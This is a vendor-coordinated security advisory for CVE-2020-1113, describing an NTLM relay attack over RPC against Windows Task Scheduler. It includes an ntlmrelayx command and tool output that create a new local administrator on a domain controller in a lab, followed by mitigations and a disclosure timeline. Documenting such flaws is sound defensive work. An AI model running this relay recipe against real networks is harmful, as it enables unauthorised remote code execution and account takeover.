################################################################################ # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ################################################################################ # # Product: Windows Task Scheduler # Vendor: Microsoft # CSNC ID: CSNC-2010-001 # CVE ID: CVE-2020-1113 # Subject: Security Feature Bypass # Risk: High # Effect: Remotely exploitable # Authors: Sylvain Heiniger # Date: 14.05.2020 # ################################################################################ Introduction: ------------- NTLM relay attacks are well-known for privilege escalation in Windows networks. Compass Security identified a security feature bypass vulnerability in Microsoft Windows. Due to the absence of integrity verification requirements for the RPC protocol and in particular the Task Scheduler, a man-in-the-middle attacker can relay his victim's NTLM authentication to a target of his choice over the RPC protocol. Provided the victim has administrative privileges on the target, the attacker can execute code on the remote target. Affected: --------- Vulnerable: * Windows 7 * Windows 8.1 * Windows 10 * Windows Server 2008 * Windows Server 2008 R2 * Windows Server 2012 * Windows Server 2016 * Windows Server 2019 For details about the affected versions and the relevant update, please refer to Microsoft's website [1]. Technical Description: ---------------------- To the best of our knowledge, there is currently no way to require signing on RPC connections hence relay attacks can be performed over RPC. A hardened system where a classical SMB relay attack would fail is still vulnerable to an attacker who can relay HTTP, SMB or RPC connections to RPC. MS-TSCH is the protocol to manage scheduled tasks. The protocol does not specify any requirement for the server in terms of checking integrity of received data. Our modified version of impacket [2] includes a new RPCRelayServer and RPCRelayClient as well as an RPCAttack (based on ATExec). In our setup, the attacker machine has the IP 172.16.100.21 while the victim machine DC is a Windows Server 2016 with the IP 172.16.100.1. We run the ntmlrelayx tool with arguments -t and -c to specify your target and command # ntlmrelayx.py -ip 0.0.0.0 -t rpc://172.16.100.1 -c "net user compass StrongPass.123 /add && net localgroup Administrators compass /add" Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation [*] Protocol Client SMB loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Running in relay mode to single host [*] Setting up RPC Server [*] Setting up SMB Server [*] Setting up HTTP Server [*] Servers started, waiting for connections ... Trigger a connection to the attacker machine. In this case the user WINLAB\scooper-da, who is in the local Administrators group of the DC machine, makes an SMB connection from the machine with IP 172.16.100.14 to the attacker machine on IP 172.16.100.21. # net view \\172.16.100.21\noshare\ The tool picks up the connection and relays it: ... [*] SMBD-Thread-4: Received connection from 172.16.100.14, attacking target rpc://172.16.100.1 [*] Authenticating against rpc://172.16.100.1 as WINLAB\scooper-da SUCCEED [*] Trying to execute specified command (net user compass StrongPass.123 /add && net localgroup Administrators compass /add) [*] Creating task \WeumPsdH [*] Running task \WeumPsdH [*] Deleting task \WeumPsdH As a result, the given command is executed (through a scheduled task) and a new local administrator is created. Workaround / Fix: ----------------- * Patch your Windows. * Enforce packet signing for clients and servers via GPO. * Check you Active Directory ACLs: Least privilege principle should be used. * Network segmentation can help prevent relaying attacks. Timeline: --------- 2020-01-27: Discovery by Sylvain Heiniger 2020-01-29: Initial vendor notification 2020-01-29: Initial vendor response 2020-02-13: Vendor acknowledgement 2020-04-16: CVE-2020-1113 assigned 2020-05-12: Release of fixed version as part of Patch Tuesday [1] 2020-05-14: Public disclosure 2020-06-14: Proof-of-concept code disclosure [3] References: ----------- [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1113 [2] https://github.com/SecureAuthCorp/impacket [3] https://github.com/CompassSecurity/impacket